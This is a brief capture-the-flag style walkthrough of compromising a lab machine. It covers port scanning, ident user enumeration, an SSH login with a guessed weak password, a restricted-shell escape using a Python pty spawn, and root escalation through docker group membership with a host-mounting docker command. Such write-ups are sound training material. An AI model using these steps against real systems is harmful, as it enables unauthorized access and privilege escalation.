🐧Peppo

Nmap

sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?

As ident is running we can use the Perl script ident-user-enum to identify which services are running under what user.

Port 10000 reports it is running under the user 'Eleanor'. I tried Bruteforcing the username on SSH and had no luck. Eventually simply trying eleanor:elenaor I was able to log in on SSH.

We see from trying the id the command we are locked in with a restricted bash shell. We can check out our command availability by viewing what binaries we have access to.

Checking GTFObins for any of these binaries can spawn a shell to escape a restricted one:

After running the above command we can export a new path and then spawn a Python shell then again export the path to having full function over the shell session.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

The command id shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

First, check what images we have available to us:

docker image ls

We can use the GTFObins command to replace the value <alpine> with one of the images listed above.

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

Returning a shell as root:

Last updated